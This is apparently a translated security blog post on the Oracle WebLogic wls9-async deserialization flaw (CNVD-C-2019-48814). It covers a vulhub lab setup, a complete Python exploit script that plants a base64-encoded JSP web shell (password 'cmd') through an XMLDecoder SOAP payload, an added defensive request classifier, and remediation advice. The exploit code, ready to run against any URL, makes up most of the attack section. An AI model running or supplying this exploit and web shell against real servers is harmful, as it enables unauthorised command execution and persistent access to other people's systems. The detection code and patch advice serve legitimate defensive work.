Recently the China National Vulnerability Database (CNVD) recorded the Oracle WebLogic wls9-async deserialization remote command execution vulnerability (CNVD-C-2019-48814). The wls9_async_response package, included by default in some WebLogic versions, provides asynchronous communication services for WebLogic Server. Because this WAR package has a flaw in how it deserializes input, an attacker can send a specially crafted HTTP request, obtain privileges on the target server and execute commands remotely without authorization.
Affected versions: WebLogic 10.X and WebLogic 12.1.3
Use the vulhub image (vulhub/weblogic).
After installing docker and docker-compose, create a docker-compose file locally with the following content:
```yaml
version: '2'
services:
  weblogic:
    image: vulhub/weblogic
    ports:
      - "7001:7001"
```
Then run the following command:
```shell
docker-compose up -d
```
Wait a while, then visit http://your-ip:7001/. A 404 page means WebLogic has started successfully.
I don't really understand the underlying principle; a script kiddie only writes tools based on existing payloads.
After WebLogic starts, visit:
url + _async/AsyncResponseService
If that path is reachable, the target is generally vulnerable.
A PoC from the internet can exploit it successfully.
Below is a script for a complete exploit.
```python
import requests
import sys

def poc():
    url = str(sys.argv[1])
    path = "/_async/AsyncResponseService"
    # AsyncResponseServiceHttps
    # AsyncResponseServiceJms
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Content-Type': "text/xml"
    }
    payload = """
<?xml version="1.0" encoding="Utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.xmlDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>echo PCUKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiU+Cg==|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
"""
    try:
        request = requests.post(url + path, data=payload, headers=headers)
        if request.status_code == 202:
            print '[+] %s Exploit success!' % url
            request2 = requests.get(url + '/_async/shell.jsp')
            if request2.status_code == 200:
                print '[+] Get shell: %s/_async/shell.jsp pass is cmd ' % url
            else:
                print '[-] Get shell fail '
        else:
            print '[-] %s Exploit failed!' % url
    except:
        print '[-] %s Address cannot connect!' % url

if __name__ == '__main__':
    poc()
```
After the attack succeeds you get a shell; the GET parameter (password) is cmd.
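As an added defender-side example (not part of the original post), the following Python classifier flags the three request patterns this page describes: a GET probe of the _async endpoint, a POST whose SOAP header carries the WorkContext/XMLDecoder gadget, and a request for a JSP under /_async/ where the WAR ships none. The sample requests and the verdict names are constructed for this example.

```python
import re

# Servlet paths of the wls9_async_response WAR named on this page.
ASYNC_ENDPOINTS = {
    "/_async/AsyncResponseService",
    "/_async/AsyncResponseServiceHttps",
    "/_async/AsyncResponseServiceJms",
}

# Malicious SOAP header patterns; case-insensitive because the payload above spells it "xmlDecoder".
BODY_INDICATORS = {
    "workcontext_header": re.compile(r"<\w+:WorkContext\b", re.I),
    "xmldecoder_gadget": re.compile(r"java\.beans\.XMLDecoder", re.I),
    "processbuilder_gadget": re.compile(r"java\.lang\.ProcessBuilder", re.I),
}

def classify_request(method: str, path: str, body: str) -> dict:
    """Verdict for one HTTP request: none, probe, suspicious, exploit or webshell."""
    path = path.split("?", 1)[0]  # drop any query string before matching
    method = method.upper()
    verdict, reasons = "none", []
    if path in ASYNC_ENDPOINTS and method == "GET":
        verdict, reasons = "probe", ["get_on_async_endpoint"]
    elif path in ASYNC_ENDPOINTS and method == "POST":
        reasons = [name for name, rx in BODY_INDICATORS.items() if rx.search(body)]
        if "workcontext_header" in reasons and "xmldecoder_gadget" in reasons:
            verdict = "exploit"
        elif reasons:
            verdict = "suspicious"
    elif path.startswith("/_async/") and path.lower().endswith(".jsp"):
        # The WAR ships no JSP under /_async/; the payload above writes shell.jsp there.
        verdict, reasons = "webshell", ["jsp_under_async"]
    return {"verdict": verdict, "reasons": reasons}

def scan(requests_seen):
    """Return (path, verdict) for every request that is not benign."""
    verdicts = [(p, classify_request(m, p, b)["verdict"]) for m, p, b in requests_seen]
    return [(p, v) for p, v in verdicts if v != "none"]

# Constructed sample traffic (not captured from a real system).
EXPLOIT_BODY = ('<soapenv:Envelope><soapenv:Header><work:WorkContext xmlns:work="x">'
                '<java class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"/>'
                '</java></work:WorkContext></soapenv:Header></soapenv:Envelope>')
SAMPLE_REQUESTS = [
    ("GET", "/_async/AsyncResponseService", ""),
    ("POST", "/_async/AsyncResponseService", EXPLOIT_BODY),
    ("GET", "/_async/shell.jsp", ""),
    ("GET", "/console/login/LoginForm.jsp", ""),
]
```

Run `scan(SAMPLE_REQUESTS)` over access-log entries or a WAF capture to get the non-benign hits; a POST whose body matches only one indicator is reported as suspicious rather than exploit.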
Remediation: delete the wls9_async_response.war package and restart WebLogic.
This is only for testing the vulnerability; do not engage in any malicious behaviour, at your own risk.